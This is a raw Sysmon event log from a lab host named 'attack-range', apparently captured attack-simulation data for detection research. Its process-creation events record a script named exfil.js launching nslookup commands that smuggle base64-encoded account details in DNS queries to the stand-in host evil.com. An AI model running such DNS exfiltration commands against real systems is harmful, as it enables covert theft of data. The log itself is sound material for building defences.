Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000196342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.181{00000000-0000-0000-0000-000000000000}3360evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:14.063{00000000-0000-0000-0000-000000000000}968evil.com0::ffff:127.0.0.1;<unknown process> 23542300x8000000000000000196340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.572{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=C62E5B4C06752B9A102A963AF3E8DAA7,SHA256=190DD5DDD014DFC9A01C5C5CC9E2A272AF642D4AED2590696D85624CCC1FB86F,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000196339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.979{00000000-0000-0000-0000-000000000000}4156evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.818{00000000-0000-0000-0000-000000000000}2872evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.674{00000000-0000-0000-0000-000000000000}4468evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000196336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:13.508{00000000-0000-0000-0000-000000000000}7264evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000196335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.541{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AF-629A-AF3E-000000005F02}7044C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.541{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AF-629A-AF3E-000000005F02}7044C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.541{2E1864BB-17AF-629A-AF3E-000000005F02}70447312C:\Windows\system32\conhost.exe{2E1864BB-17AF-629A-AE3E-000000005F02}4288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.524{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-AF3E-000000005F02}7044C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.504{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.504{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.504{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.504{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.504{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-AE3E-000000005F02}4288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.504{2E1864BB-17A1-629A-783D-000000005F02}55521028C:\Windows\System32\WScript.exe{2E1864BB-17AF-629A-AE3E-000000005F02}4288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.517{2E1864BB-17AF-629A-AE3E-000000005F02}4288C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvqpge.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.504{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlslo.tmpMD5=14EFE03E0C67AE598772AE00481DF4D7,SHA256=91A875FE4CE713F3E89451B0A4F3D74F67372C5460101AA4ED9323B82D4A430D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.488{2E1864BB-17AF-629A-AC3E-000000005F02}73287616C:\Windows\system32\conhost.exe{2E1864BB-17AF-629A-AD3E-000000005F02}4284C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.488{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.488{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.472{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.472{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.472{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-AD3E-000000005F02}4284C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.472{2E1864BB-17AF-629A-AB3E-000000005F02}73366672C:\Windows\system32\cmd.exe{2E1864BB-17AF-629A-AD3E-000000005F02}4284C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.487{2E1864BB-17AF-629A-AD3E-000000005F02}4284C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AF-629A-AB3E-000000005F02}7336C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlslo.tmp 2>&1 23542300x8000000000000000196315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.472{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F1E8976650D6B7FBBC5A3732D25D14C,SHA256=BDC297DB34C8901C6E566A515304C836A1B76B9550EEC31BD5BF5D11258C33A4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.472{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AF-629A-AC3E-000000005F02}7328C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.472{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AF-629A-AC3E-000000005F02}7328C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.457{2E1864BB-17AF-629A-AC3E-000000005F02}73287616C:\Windows\system32\conhost.exe{2E1864BB-17AF-629A-AB3E-000000005F02}7336C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000196311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.457{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4A45EFAA417509A7B2E85128B567AC9,SHA256=F326499AE73E106C16F8205787742673748D2CDAAA761E9A0C5B8B0B1E77D18F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.457{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-AC3E-000000005F02}7328C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.441{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.441{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.441{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.441{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 